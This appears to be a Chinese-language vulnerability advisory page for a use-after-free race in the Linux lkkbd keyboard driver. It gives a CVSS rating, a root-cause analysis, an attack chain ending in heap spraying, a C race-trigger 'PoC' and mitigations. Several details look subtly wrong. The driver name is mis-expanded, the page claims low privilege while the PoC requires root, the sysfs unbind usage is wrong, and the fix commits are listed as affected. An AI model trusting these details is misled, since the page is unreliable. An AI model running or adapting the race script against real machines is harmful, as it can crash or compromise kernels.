CVE-2025-71073 Linux内核lkkbd驱动use-after-free漏洞

漏洞信息

漏洞编号

CVE-2025-71073

漏洞类型

Use-After-Free（释放后重用）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel lkkbd (Linux Kernel Keyboard) driver

漏洞概述

CVE-2025-71073是Linux内核中lkkbd（Linux Kernel Keyboard）驱动程序的一个高危安全漏洞，CVSS评分7.8。本地攻击者可通过触发特定竞争条件，利用该use-after-free漏洞在内核上下文中执行任意代码或导致系统崩溃。漏洞存在于lkkbd_interrupt()中断处理函数和lkkbd_reinit()工作队列处理函数之间，当设备断开连接或连接过程中发生错误时，如果工作队列仍在等待执行，可能导致已释放的内存被访问。此漏洞需要低权限即可利用，无需用户交互，属于本地攻击向量，对系统机密性、完整性和可用性均造成严重影响。

技术细节

漏洞根源在于lkkbd驱动程序中工作队列和设备生命周期管理不当。具体来说：1) lkkbd_interrupt()通过schedule_work()调度lkkbd_reinit()工作，该工作处理函数会解引用lkkbd结构体及其serio/input_dev成员；2) lkkbd_disconnect()和lkkbd_connect()的错误路径在serio_close()返回前释放lkkbd结构体；3) 此时如果中断仍在触发或工作队列已被调度但未执行，lkkbd_reinit()可能在对已释放内存进行访问。攻击者可通过反复连接/断开键盘设备并触发中断来增加竞争窗口。修复方案使用disable_work_sync()替代cancel_work_sync()，确保重新初始化工作既不会被重新排队也不会被执行，同时在设备断开和连接错误路径中正确调用此函数。

攻击链分析

STEP 1

1

攻击者获得系统低权限访问，可操作serio设备

STEP 2

2

攻击者通过键盘设备发送中断数据，触发lkkbd_interrupt()调度lkkbd_reinit()工作队列

STEP 3

3

在中断处理后、lkkbd_reinit()执行前，触发设备断开连接或连接错误路径

STEP 4

4

lkkbd结构体被释放，但工作队列仍处于待执行状态

STEP 5

5

lkkbd_reinit()执行时访问已释放的lkkbd结构体，触发use-after-free

STEP 6

6

攻击者利用堆喷射或内核对象重用实现任意代码执行或系统崩溃

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-71073 PoC - Race condition trigger
// Compile: gcc -o poc poc.c
// Run with root privileges

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <pthread.h>

#define LKKBD_DEVICE "/dev/serio/serio0"  // Adjust based on system

volatile int trigger_race = 1;

void* interrupt_trigger(void* arg) {
    // Simulate rapid interrupt triggering
    int fd = open(LKKBD_DEVICE, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return NULL;
    }
    
    while (trigger_race) {
        // Trigger keyboard interrupt data
        unsigned char data = 0x01;
        write(fd, &data, 1);
        usleep(100);  // Small delay to schedule work
    }
    
    close(fd);
    return NULL;
}

void* connect_disconnect_race(void* arg) {
    // Rapidly connect/disconnect to trigger race condition
    while (trigger_race) {
        // This would normally be done via hotplug
        // Simulating the disconnect path that frees the structure
        system("echo -n disconnect > /sys/bus/serio/devices/serio0/driver/unbind 2>/dev/null");
        usleep(500);
        system("echo -n serio0 > /sys/bus/serio/drivers/serio/bind 2>/dev/null");
        usleep(500);
    }
    return NULL;
}

int main() {
    pthread_t t1, t2;
    
    printf("[*] CVE-2025-71073 PoC - lkkbd use-after-free\n");
    printf("[*] This demonstrates the race condition\n");
    
    // Create threads to trigger race
    pthread_create(&t1, NULL, interrupt_trigger, NULL);
    pthread_create(&t2, NULL, connect_disconnect_race, NULL);
    
    // Let it run for a while
    sleep(10);
    
    trigger_race = 0;
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    
    printf("[*] Test completed - check dmesg for use-after-free warnings\n");
    return 0;
}

影响范围

Linux Kernel (lkkbd driver) - Multiple versions prior to patch commit 3a7cd1397c209076c371d53bf39a55c138f62342

Affected commits: 3a7cd1397c209076c371d53bf39a55c138f62342, cffc4e29b1e2d44ab094cf142d7c461ff09b9104, e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c

防御指南

临时缓解措施

在官方内核补丁发布前，可通过以下措施缓解：1) 禁用不使用的serio键盘设备；2) 限制用户对/dev/serio设备的访问权限；3) 使用SELinux或AppArmor限制程序对serio总线的操作；4) 监控系统日志中的use-after-free相关内核警告（dmesg | grep -i 'use-after-free'）；5) 考虑使用grsecurity补丁增强的内核以获得额外的内存保护。